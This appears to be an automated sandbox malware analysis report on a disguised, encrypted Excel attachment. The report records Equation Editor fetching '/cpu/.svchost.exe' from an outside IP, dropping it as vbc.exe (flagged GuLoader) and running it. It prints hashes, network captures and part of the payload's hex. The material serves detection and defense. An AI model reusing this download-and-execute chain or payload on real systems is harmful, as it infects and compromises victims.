                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7A07AD.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category:dropped
                      Size (bytes):85020
                      Entropy (8bit):7.2472785111025875
                      Encrypted:false
                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious:false
                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                      C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                      Malicious:true
                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      C:\Users\Public\vbc.exe
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):267376
                      Entropy (8bit):4.7769054763067915
                      Encrypted:false
                      SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                      MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                      SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                      SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                      SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 42%, Browse
                      • Antivirus: Metadefender, Detection: 14%, Browse
                      • Antivirus: ReversingLabs, Detection: 31%
                      Joe Sandbox View:
                      • Filename: Booking Confirmation.xlsx, Detection: malicious, Browse
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:CDFV2 Encrypted
                      Entropy (8bit):7.994138372411622
                      TrID:
                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                      File name:MTIR21487610_0062180102_20210714081247.PDF.xlsx
                      File size:1268792
                      MD5:168c2cabea51b16aa19a152a652254f5
                      SHA1:477715c6a9d3219ea85a60eac9c80af83a102357
                      SHA256:9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
                      SHA512:fe86fb777b4f1985fe62a65a55474f3509cc512d348a09dd52e5573b158c3948fefef073e1a451624c5f000a94f673334ce6e33ae0a5f5254a4b3913353da7c1
                      SSDEEP:24576:umfPHCGbjiYxz58oRX1HjpN4V0g9LxJMmKu5QL6HiIFjQrcFE://Hi4z5DVj0OgWu5Q2CIFjKcFE
                      File Content Preview:........................>...............................................................................................~.......z.......{.......z.......z......................................................................................................

                      File Icon

                      Icon Hash:e4e2aa8aa4b4bcb4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "MTIR21487610_0062180102_20210714081247.PDF.xlsx"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:False

                      Streams

                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                      General
                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                      File Type:data
                      Stream Size:64
                      Entropy:2.73637206947
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                      General
                      Stream Path:\x6DataSpaces/DataSpaceMap
                      File Type:data
                      Stream Size:112
                      Entropy:2.7597816111
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                      General
                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                      File Type:data
                      Stream Size:208
                      Entropy:3.35153409046
                      Base64 Encoded:False
                      Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                      Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                      General
                      Stream Path:\x6DataSpaces/Version
                      File Type:data
                      Stream Size:76
                      Entropy:2.79079600998
                      Base64 Encoded:False
                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1254968
                      General
                      Stream Path:EncryptedPackage
                      File Type:data
                      Stream Size:1254968
                      Entropy:7.99875082678
                      Base64 Encoded:True
                      Data ASCII:' & . . . . . . . . . . . g . . Z . . . . . . D . . . D n . ? w . . . K . F . . / . # . . & . . . ? . . . . / . . . . . . . j . q . q & . Z . b . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b .
                      Data Raw:27 26 13 00 00 00 00 00 b4 f8 fd f3 03 67 b7 e8 5a a8 8f 06 bd 1e c7 44 f8 02 97 44 6e e5 3f 77 bc ec f7 4b e9 46 c9 1e 2f 1b 23 c2 0b 26 b3 1e b2 3f de fd d4 0d 2f f5 b1 c7 ff df ca aa 6a 19 71 f6 71 26 bf 5a bf 62 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2
                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                      General
                      Stream Path:EncryptionInfo
                      File Type:data
                      Stream Size:224
                      Entropy:4.61267256672
                      Base64 Encoded:False
                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . Y . u . . . . j r r . . n . ^ \\ . . . . . . . . . V . . . . w . . . . h S o . . . . . . . . . . . . G o . . . . . % . b P . . . . . .
                      Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 20 1a c9 02 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 15, 2021 11:06:44.594949961 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:44.849909067 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:44.850059986 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:44.850883961 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.107646942 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.107681990 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.107701063 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.107719898 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.107873917 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.362483978 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362519979 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362535000 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362550020 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362567902 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362636089 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.362639904 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362663031 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.362669945 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.362704039 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362720013 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.362741947 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.362747908 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.618730068 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618763924 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618777037 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618792057 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618803024 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618815899 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618830919 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618844032 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618860006 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618886948 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.618891954 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618922949 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.618927002 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.618972063 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.618987083 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.619029999 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.619050026 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.619062901 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.619077921 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.619091988 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.619111061 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.619122028 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.619189024 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.620773077 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873116970 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873153925 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873182058 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873194933 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873210907 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873229980 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873383045 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873482943 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873498917 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873513937 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873579979 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873600006 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873605013 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873615980 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873656034 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873687029 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873863935 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873891115 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873907089 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873923063 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873909950 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873936892 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873955965 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873959064 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.873987913 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.873989105 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874003887 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874034882 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874041080 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874043941 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874059916 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874063015 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874064922 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874066114 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874109030 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874181986 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874197960 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874212980 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874228954 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874248028 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874257088 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874260902 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874264002 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874289036 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874304056 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874317884 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874351978 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874361038 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874363899 CEST4916580192.168.2.22180.214.239.39
                      Jul 15, 2021 11:06:45.874454975 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874471903 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874486923 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874499083 CEST8049165180.214.239.39192.168.2.22
                      Jul 15, 2021 11:06:45.874521017 CEST4916580192.168.2.22180.214.239.39

                      HTTP Request Dependency Graph

                      • 180.214.239.39

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.2249165180.214.239.3980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      TimestampkBytes transferredDirectionData
                      Jul 15, 2021 11:06:44.850883961 CEST1OUTGET /cpu/.svchost.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 180.214.239.39
                      Connection: Keep-Alive
                      Jul 15, 2021 11:06:45.107646942 CEST2INHTTP/1.1 200 OK
                      Date: Thu, 15 Jul 2021 09:06:43 GMT
                      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                      Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT
                      ETag: "41470-5c7043f493d18"
                      Accept-Ranges: bytes
                      Content-Length: 267376
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/x-msdownload
                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELFR`pp@d(zX ( .text0Y` `.datapp@.rsrcz@@IMSVBVM60.DLL


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:11:05:42
                      Start date:15/07/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13ffb0000
                      File size:27641504 bytes
                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:11:06:04
                      Start date:15/07/2021
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Imagebase:0x400000
                      File size:543304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:11:06:07
                      Start date:15/07/2021
                      Path:C:\Users\Public\vbc.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\Public\vbc.exe'
                      Imagebase:0x400000
                      File size:267376 bytes
                      MD5 hash:FCFB0EC70F1419EDE8A534CC95CB61E9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
